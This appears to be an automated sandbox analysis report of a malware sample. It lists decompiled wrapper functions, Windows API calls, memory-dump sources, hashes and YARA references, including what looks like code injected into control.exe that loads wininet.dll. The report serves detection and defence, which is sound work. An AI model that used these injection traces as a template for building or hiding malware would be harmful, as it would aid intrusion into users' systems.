Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction Fuzzy Hash: E301D431A8022877E720A6959C03FFE772C5B00B55F14016EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188C2, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004188C2(void* __eax, void* __ebx, signed int __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				signed int _v117;
				char _t16;
				void* _t24;

				asm("std");
				asm("repne mov [0x28056294], eax");
				_v117 = _v117 ^ __edx;
				_t13 = _a4;
				_t6 = _t13 + 0xc74; // 0xc74
				E004191C0(_t24, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t16;
			}

0x004188c2
0x004188c4
0x004188cf
0x004188d3
0x004188df
0x004188e7
0x004188fd
0x00418901

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2d7ad5477b2ae2e4b78402ea145ca09bf698d8949c0809a9a5a63c96b7740a46
Instruction ID: 35031471cab43e0562332dc36d5117d916e0a1248efdb54558997958e1f2bb86
Opcode Fuzzy Hash: 2d7ad5477b2ae2e4b78402ea145ca09bf698d8949c0809a9a5a63c96b7740a46
Instruction Fuzzy Hash: A2E06DB52406057FDB14DFA9CC85EEB7BA8EF88350F104659F91D9B242C230E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004188D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191C0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188df
0x004188e7
0x004188fd
0x00418901

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 2a8b4d01c77f57f9537e4a8c9056324bca9a4fb502523cc2798246bee73f8781
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D7E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FA085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A2B, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A2B(void* __eax, void* __ebx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t18;
				void* _t25;

				_t15 = _a4;
				E004191C0(_t25, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t18;
			}

0x00418a33
0x00418a4a
0x00418a60
0x00418a64

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b7c379ebd69bae47a06213d5ab57014019a7d6c1e6574f7ed9c64f153c1beae9
Instruction ID: a5f43cbd0bfd68618330dd1eca254e0c3ea906c094a91cc4b77eab275cf0f659
Opcode Fuzzy Hash: b7c379ebd69bae47a06213d5ab57014019a7d6c1e6574f7ed9c64f153c1beae9
Instruction Fuzzy Hash: DDE01AB5204208ABDB14DF49CC85EEB37A9EF89750F0185A9FE095B242D635E850CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418A30, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A30(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191C0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a4a
0x00418a60
0x00418a64

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: fa95252e36870a94604636740fee15c405cfb0840f5ac42baad6929b42f97f84
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1AE01AB12002086BDB10DF49CC85EE737ADAF89650F018555FA0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418910, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ebe942e9f85fd7778464d46fb55928cc225e25ca24bfac27d2b1ada9d5edf0ef
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 09D012716002147BD620DB99CC85FD7779CDF49750F018465BA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418902, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0c4a2c020829b4b72cf11445914dafe5975f46eabcc8fa32018438f2b2d71d8a
Instruction ID: e22ef75d1f2aa3dd788397c583aa4accfb8e9ed224d86712cdfacc5690ff3d49
Opcode Fuzzy Hash: 0c4a2c020829b4b72cf11445914dafe5975f46eabcc8fa32018438f2b2d71d8a
Instruction Fuzzy Hash: 10C08CBC5042406BCB00EF258CD1CC7B7A16F83308324C80FF89542707E67CD650829A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406ABB, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9bfd908822a05247aadeee980cae6d30dc0b85c0fcb479a4c70638f846d77f4
Instruction ID: 67e8a8dcabc75377780cf3839544f22e4169673bf2a7e3a3f8f400bd6e833a80
Opcode Fuzzy Hash: f9bfd908822a05247aadeee980cae6d30dc0b85c0fcb479a4c70638f846d77f4
Instruction Fuzzy Hash: 91B09223A5700611E424483D7C402F8E3A8EB93534E5033A7AC28E72A09983D491008D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 980 Parent PID: 3424 control.exeCOMMON

Executed Functions

Function 028485BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02843BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02843BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0284860D

Strings

.z`, xrefs: 028485FD, 02848608

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: b05aba887c2638313701562500dd0e20b81f190a694f21853ca62a67ee73761a
Instruction ID: 9f0571474176118f0dce17e68ff75e6d0f43c56c71529a5e057dad9c152cbf84
Opcode Fuzzy Hash: b05aba887c2638313701562500dd0e20b81f190a694f21853ca62a67ee73761a
Instruction Fuzzy Hash: 28F0C4B6200208AFCB08CF88DC84EEB77ADAF8C754F158648FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 028485C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02843BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02843BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0284860D

Strings

.z`, xrefs: 028485FD, 02848608

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: c4c8ff315d93611fb0277f85f402a1555a8849d9aed01894f8a07915feaca691
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F6F0B2B6200208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0284866A, Relevance: 1.6, APIs: 1, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02843D72,5E972F65,FFFFFFFF,02843A31,?,?,02843D72,?,02843A31,FFFFFFFF,5E972F65,02843D72,?,00000000), ref: 028486B5

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bbd90090968f488a82df143a007aeeefd7faf4ce51820cd575259c8fada9af2d
Instruction ID: fdfa25035440ad0a4107677230857447ed190c3f0c3d981e6d63d4ff7164f581
Opcode Fuzzy Hash: bbd90090968f488a82df143a007aeeefd7faf4ce51820cd575259c8fada9af2d
Instruction Fuzzy Hash: A211D2BA200108AFCB14DF99DC94DEB77ADAF8C754B158648FA0DE3251DA30E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02848670, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02843D72,5E972F65,FFFFFFFF,02843A31,?,?,02843D72,?,02843A31,FFFFFFFF,5E972F65,02843D72,?,00000000), ref: 028486B5

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: e8165e15ef406f70cb071cfdc640f0124759bd1921092fa1a23f09e9e73bf911
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 1CF0A4B6200208ABCB14DF89DC84EEB77ADAF8C754F158648BA1D97241DA30E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 028487A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02832D11,00002000,00003000,00000004), ref: 028487D9

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 4434903d32aad4be0c377fed63b340956529dfe9ac0e8c13569c51f6ebc03e2f
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 75F015B6200208ABCB14DF89CC80EAB77ADAF88750F118548FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 028486EA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02843D50,?,?,02843D50,00000000,FFFFFFFF), ref: 02848715

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e56ce37a4e51bbe80a1829cf16d74d1392efa1d5ffc89d7bce0b568050c4b422
Instruction ID: 6ba09f81dd64ef67eed74275b5711656bcf9a6bf528b270af8582564333dbf93
Opcode Fuzzy Hash: e56ce37a4e51bbe80a1829cf16d74d1392efa1d5ffc89d7bce0b568050c4b422
Instruction Fuzzy Hash: 5AE0C2792402147BD720EFA8CC85EE77B6DEF48750F054598FE589B242C530E504C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 028486F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02843D50,?,?,02843D50,00000000,FFFFFFFF), ref: 02848715

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 4d010b2cfd0d281996161b501ecd709dae18c6314af7bab801af39dee7a8672b
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 8DD012752002146BD710EB98CC45E97775DEF44750F154455BA189B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04699860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469986A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c18b894b73753da431ade419242ff73c980ebd874e71407d007edea34cbdcfb5
Instruction ID: 585417d794c919f1a57234305b76916ee780b09e9f30ddc21246b44ee1828afb
Opcode Fuzzy Hash: c18b894b73753da431ade419242ff73c980ebd874e71407d007edea34cbdcfb5
Instruction Fuzzy Hash: 099002B120140423F11165594505707000E97D1285FD1C412A0425598DAA96DD62B561

Uniqueness

Uniqueness Score: -1.00%

Function 04699840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469984A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69a92b8fa578c58fd4be83ae247aa7699c5245d4fcafa06973671a932e4338f7
Instruction ID: 8ae75fe2febe7f7ab701d0f614a331bc32dca75b7d8f6e9bae2d2bcbd4dec12e
Opcode Fuzzy Hash: 69a92b8fa578c58fd4be83ae247aa7699c5245d4fcafa06973671a932e4338f7
Instruction Fuzzy Hash: 0F9002A1242441627545B5594405507400BA7E12857D1C012A1415990C9966EC66EA61

Uniqueness

Uniqueness Score: -1.00%

Function 04699540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469954A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba05b71e9ad2744a294f52b69d1c10cf225d7daf6c8d4edad35a0d8955afde3f
Instruction ID: e22eb02aa2ea41a41b091720f47f60165545c6b86bc01e950ed9929283b3e8b7
Opcode Fuzzy Hash: ba05b71e9ad2744a294f52b69d1c10cf225d7daf6c8d4edad35a0d8955afde3f
Instruction Fuzzy Hash: 889002A5211400132105A9590705507004B97D6395391C021F1016590CEA61DC716561

Uniqueness

Uniqueness Score: -1.00%

Function 04699910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469991A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a9113a5d50182feda53a4770b1e980e33d4bc145ce4f9f1fec200f75bf2622d
Instruction ID: 1265a3e112edf7305ad732bc0f6268e0fe629e1ba153843708a06f2820fb39c9
Opcode Fuzzy Hash: 8a9113a5d50182feda53a4770b1e980e33d4bc145ce4f9f1fec200f75bf2622d
Instruction Fuzzy Hash: 019002F120140412F14075594405746000A97D1345F91C011A5065594E9A99DDE57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 046995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046995DA

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 143b1953d07bc958c901a129ce37e593d43a4d4d75a113022d04c723bbc1010a
Instruction ID: 8e901226396ea73de4852c689ad3f13a0f345e57194340c22253a7f7f2bb27a2
Opcode Fuzzy Hash: 143b1953d07bc958c901a129ce37e593d43a4d4d75a113022d04c723bbc1010a
Instruction Fuzzy Hash: 519002E120240013610575594415616400F97E1245B91C021E10155D0DD965DCA17565

Uniqueness

Uniqueness Score: -1.00%

Function 046999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046999AA

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bd3aaaf88ab75aff46a5c272b4853538c323a3dccb2299778def40c702f3506
Instruction ID: cce34e79e560e4330f540866a73b28ebc93332045e82ab8a28f752372cc353ee
Opcode Fuzzy Hash: 2bd3aaaf88ab75aff46a5c272b4853538c323a3dccb2299778def40c702f3506
Instruction Fuzzy Hash: 979002E134140452F10065594415B06000AD7E2345F91C015E1065594D9A59DC627566

Uniqueness

Uniqueness Score: -1.00%

Function 04699660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469966A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1940a7516a1f843151a9e4e0891805e32858ad0cbf56038cd4b5a52b884fb3d4
Instruction ID: 03a3ee1858e502db561630d18c120f6eca0831f771e98d6d6af896093bead073
Opcode Fuzzy Hash: 1940a7516a1f843151a9e4e0891805e32858ad0cbf56038cd4b5a52b884fb3d4
Instruction Fuzzy Hash: 989002B120140812F1807559440564A000A97D2345FD1C015A0026694DDE55DE697BE1

Uniqueness

Uniqueness Score: -1.00%

Function 04699A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04699A5A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05c0d72f9f84358aa26e803f92a411565abc6aaf1a00f0e32ee26b07541abaf1
Instruction ID: 81690eef31d3c130f8f7b3bcc94ab726f9d7100d5bcea715a49f171846db3adc
Opcode Fuzzy Hash: 05c0d72f9f84358aa26e803f92a411565abc6aaf1a00f0e32ee26b07541abaf1
Instruction Fuzzy Hash: 939002A1211C0052F20069694C15B07000A97D1347F91C115A0155594CDD55DC716961

Uniqueness

Uniqueness Score: -1.00%

Function 04699650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469965A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffcb9793cc2e861c94f145dab5e4731123d598a622b965250d85e592f1b085c9
Instruction ID: 282fe9f678f9756c1d2b318a0533a6314352cb80d9bca1ebef84e4203a6a948e
Opcode Fuzzy Hash: ffcb9793cc2e861c94f145dab5e4731123d598a622b965250d85e592f1b085c9
Instruction Fuzzy Hash: A79002B120544852F14075594405A46001A97D1349F91C011A00656D4DAA65DD65BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 046996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046996EA

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25f3035c4febecfce412c48a50972f61ca8df2ef2304a1e30c8df89c4d009a4e
Instruction ID: 5ad76b2aff4890eb857e531d3421e216cc57194bf527d7c3155094a3e475f9a4
Opcode Fuzzy Hash: 25f3035c4febecfce412c48a50972f61ca8df2ef2304a1e30c8df89c4d009a4e
Instruction Fuzzy Hash: 619002B120148812F1106559840574A000A97D1345F95C411A4425698D9AD5DCA17561

Uniqueness

Uniqueness Score: -1.00%

Function 046996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046996DA

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5dd609207d4391e9e7c261fc8340785bc905b910d287ae2981674b88f0f75051
Instruction ID: 4880178289a73039ddb70b088d35a51571e34453aa537737099b5966fcd96aa0
Opcode Fuzzy Hash: 5dd609207d4391e9e7c261fc8340785bc905b910d287ae2981674b88f0f75051
Instruction Fuzzy Hash: 869002B120140852F10065594405B46000A97E1345F91C016A0125694D9A55DC617961

Uniqueness

Uniqueness Score: -1.00%

Function 04699710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469971A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7635e5b4cafe5d4e5605af5eec3e5eba85ec5ae39d1d054969d52cea7b9addd1
Instruction ID: c6c217f30d8e1d79d13815d2107e4f11151f68cf8dd6fb74f2bcbb37f45662ee
Opcode Fuzzy Hash: 7635e5b4cafe5d4e5605af5eec3e5eba85ec5ae39d1d054969d52cea7b9addd1
Instruction Fuzzy Hash: C69002B120140412F10069995409646000A97E1345F91D011A5025595EDAA5DCA17571

Uniqueness

Uniqueness Score: -1.00%

Function 04699FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04699FEA

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7dde132ccca3a15eee58fee183478b8be2da224ea35d271fa450071a9aa1205e
Instruction ID: 6ceea7a45f1df84e88e587594e81f023024977ac312ef2176da0b2ce9f750846
Opcode Fuzzy Hash: 7dde132ccca3a15eee58fee183478b8be2da224ea35d271fa450071a9aa1205e
Instruction Fuzzy Hash: 4E9002B131154412F11065598405706000A97D2245F91C411A0825598D9AD5DCA17562

Uniqueness

Uniqueness Score: -1.00%

Function 04699780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0469978A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0a62318168afe21adb0deb5f50527fcefa655fc520d6014d2b5b40becb1eab4
Instruction ID: c3f810f13aac83a3456de22326894cc8afe1e939f58cd6334f22d75a0f43aa6f
Opcode Fuzzy Hash: f0a62318168afe21adb0deb5f50527fcefa655fc520d6014d2b5b40becb1eab4
Instruction Fuzzy Hash: 259002A921340012F1807559540960A000A97D2246FD1D415A0016598CDD55DC796761

Uniqueness

Uniqueness Score: -1.00%

Function 028472E0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02847388

Strings

wininet.dll, xrefs: 0284733E, 02847347
net.dll, xrefs: 02847351, 028473D7, 028473AF, 028473BB, 028473E3

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6b2d35fc7ab7b1b82f1a5eeac425d75d5c04c1e3591e28ce8adc2d02a8ea4c1b
Instruction ID: 5950d25fe7529c26e7333d20fe316180e8410467cd96384fa06414f8c2124b49
Opcode Fuzzy Hash: 6b2d35fc7ab7b1b82f1a5eeac425d75d5c04c1e3591e28ce8adc2d02a8ea4c1b
Instruction Fuzzy Hash: 8B318FBA541608ABD711DF68C8A0FABF7B9EF48704F04851DFA199B240DB70B445CBE1

Uniqueness

Uniqueness Score: -1.00%

